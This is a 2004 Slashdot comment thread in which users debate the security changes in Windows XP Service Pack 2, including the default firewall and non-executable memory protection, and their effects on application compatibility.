    Y'know, there comes a point where you have to say, I can ride my bicycle without training wheels.

    I understand that MS is fighting a bad PR image. But if this is how Microsoft "innovates"... Well, might as well just have lightweight users use Macs (which will hold their hands) and pro users/developers can use Linux.
  • by Craig Ringer ( 302899 ) on Saturday March 06, 2004 @11:43AM (#8485153) Homepage Journal
    Finially, they're biting the bullet and doing the right thing. A sensibly configured default firewall - it's one of the things they should've been doing for years. The memory protection is also interesting - and probably a good move, so long as developers don't start using it as a crutch.

    Now, if we see built-in virus protection, tainting or sandboxing of executable code recieved by email, proper MIME handling, and flagging of double extensions, AND AUTOMATIC UPDATES THAT ARE ON BY DEFAULT, it'll be mostly there.

    Even forcing users to take an extra step (like the 'chmod u+x' required on *NIX) to make emailed and downloaded files executable would help a _lot_. Sure, viri would just start saying "click properties, then tick 'executable'" in the messages; but it'd stop a lot of the worst offenders from viewing things without thinking.
    • by spitzak ( 4019 ) on Saturday March 06, 2004 @02:11PM (#8486138) Homepage
      extra step (like the 'chmod u+x' required on *NIX)

      Hey I like Unix and dislike Windows, but this is a bit of Linux-fud. This is not some amazing "security feature" invented by K&R in 1970. Here are the facts:

      1. A program can call "exec" on any file, whether or not it has the execute bit set. The system does not check, so this is not any real protection. Imagine a "Linux Outlook" written without any assumptions about security, the MS-style author of the program would certainly make it so that clicking on an executable would call exec or popen. The main security in Linux is that the email program writers never considered that somebody would want to run a program, they either save it as a file or open it as text. But considering that Microsoft went through the trouble of actually interpreting the attachement as a .exe and locating the icon resource and displaying it, it is obvious that such thinking does occur to programmers and could easily have happened on Linux.

      2. Any program with permission to write the file can turn on the execute bit. For instance tar will restore the execute bits back on the tar'd files. A "user friendly" program would certainly turn on the bit on received files that indicated they want it, since that is what the user wants.

      3. The real purpose of the execute bit:

      When Unix was written in 1970, a powerful machine had 64K of memory and disks spun at a few hundred rpm. In addition the original design assummed executable programs and data files would be mixed together in the same directories. Especially the current directory: the idea that putting "." somewhere other than the start of the path for security did not occur till maybe 1980 (and it is still missing from Windows CMD.EXE!) Besides the current directory people would often modify their path to include their friend's home directories (to get their programs) or to get different versions of programs.

      On such machines it would take many seconds to try to open a given file in each of several directories on the path. The only way to make a command run efficiently would be to store a hash table in memory saying which directory was the first on the path that each command was in (the command "rehash" in csh shells would recalculate this).

      In the directory structure people were using then, over half the files on the path would not be executable and thus not commands. The rehash command could greatly reduce memory usage if it could eliminate these right away. The correct solution (opening the files and checking for magic execute bytes) would be far too slow. So they decided to dirty up the file system by adding a single "attribute" in the form of the execute bit, so the rehash could skip files quickly.

      That is why the execute bit is there. It is not a security feature.

  • Stop Crying Wolf (Score:3, Insightful)

    by Noehre ( 16438 ) on Saturday March 06, 2004 @12:48PM (#8485574)
    As anybody that has been running the beta of SP2 probably knows, this incredible application-breaking feature is ******OPTIONAL******* and can be ****TURNED OFF IF IT PRODUCES PROBLEMS****.

    Furthermore, it doesn't even work in non-Opteron processors.

    I mean, people are acting like upgrading to SP2 is going to suddenly destroy their ability to use applications when this option isn't even on by default.

    Certainly you people aren't this ignorant, are you?
  • by wotevah ( 620758 ) on Saturday March 06, 2004 @12:50PM (#8485585) Journal

    Quoting from the article linked below:

    Starting with Windows XP Service Pack 2, on processors which support it (according to the web page, currently AMD K8, Itanium, and AMD64), the stack and heap will not be executable. If you try to execute the stack or the heap, an exception will be raised and the code will not execute. In other words, execute page protection will soon be enforced, now that processors exist that support it. (Actually, I believe Windows XP for Itanium already used this new protection level, so those of you who have been playing around with your Itanium may have seen this already.)

    If you were a good developer and followed the rules on page protections, then this has no effect on you. But if you cheated the rules and took advantage of specific hardware implementation details, you may find yourself in trouble. Consider yourselves warned.

    posted on Tuesday, November 04, 2003 3:38 AM

    http://weblogs.asp.net/oldnewthing/archive/2003/11 /04/55560.aspx [asp.net]

  • by Maul ( 83993 ) on Saturday March 06, 2004 @02:10PM (#8486124) Journal
    The Good:

    Microsoft needs to do some house cleaning of Windows, and this seems as if it really is a step in the right direction as far as fixing up some of the security problems.

    The Bad:

    Of course, this is Microsoft we're talking about. If Microsoft can get away with purposefully breaking third party applications and then making it seem like it is for "security" purposes, they will.

    Naturally, one has to wonder what havoc this SP will cause with 3rd. party firewall and antivirus software. It is not hard to imagine Symantec and McAfee taking a huge loss in user base if SP2 breaks their software, and then Microsoft says, "Well, those apps weren't well written or else SP2 wouldn't have broken them. Fortunately firewall and antivirus are built into Windows now, so you can ditch that 3rd. party software."

    And this also will not really do very much to stop the spread of viruses/worms/trojans and adware, at least not immediately. The reasons are:

    1. Most home users never run Windows Update. MS can tout the new security features all they want, but most users will not have these features because they won't patch.

    2. People will still find a way to purposefully click on email attachments. I've known people who can't get weird email attachments because their AV software blocks it, so they DISABLE their AV software to open it.

    3. SP2 doesn't look like it will address IE/ActiveX control issues that Adware writers love to take advantage of.

    And of course, Microsoft is still pushing their campaign to integrate everything and the kitchen sink into the OS. First it was IE, now it is media player that MS claims is a vital component of Windows. Next it will be firewall and antivirus. These improvements should be modular so that users who have an external firewall or prefer a 3rd. party solution can simply knock it out of their install.
  • by Eric_Cartman_South_P ( 594330 ) on Saturday March 06, 2004 @03:54PM (#8486845)
    Ever since Win98, MS has the following attitude about code:

    Hack hack hack hack, remove hack, hack a hack, hack hack hack...

    Their code is SO CHOCK FULL OF HACKS to support older applications, and even hack to hack old hacks, that eventually the OS will crumble under its own weight.

    The Apple transistion from OS 9 to OS X was VERY slick. Give old apps a Classic mode, and as apps get rewritten you use the new rewritten version in the main OS, and only dip into Classic mode for the old/unconverted apps. After a few years, get rid of the Classic mode and yay, millions of people easily converted from one generation OS to the next. Watching Apple move people from OS 9 to OS X was what caught my eye and made me think "This company has a fucking clue!" And once I saw 10.3, I bought a Powerbook. Too good to refuse.

    With windows, it's still hack hack hack hack... I can't wait to be ENTERTAINED when Longhorn comes out. It's going to be a great laugh at that mess. And great for self employed geeks like me that work as consultants. MS makes a mess every couple of years, and that keeps us geeks paid cleaning up the mess.

    The fix, as I see it: MS, IMO, should write Longhorn without ANY HACKS for old apps, and include with the OS a free copy of Virtual PC running Windows XP. Treat Virtual PC (which they now own) as Apple did with their Classic mode.

    Of course, MS won't do this, and couldn't do it right if they tried, and at the end you still have a crappy OS full of security holes and a bad GUI. Oh well.

  • Good (Score:4, Insightful)

    by Kaboom13 ( 235759 ) <kaboom108&bellsouth,net> on Sunday March 07, 2004 @03:32AM (#8489815)
    MS is far from perfect, but worrying constantly about reverse compatibility is one of the major reasons windows is so insecure IMO. Microsoft can't take any big leaps in security as long as they have to work around 5 years of hacks and tweaks to keep things working. Microsoft seems to be doing a good job of giving developers fair warning. Furthermore, Windows actually has an excellent method for rolling back service packs, so even if it does break that mission critical app you can roll back and wait for an update.

Professional wrestling: ballet for the common man.

Working...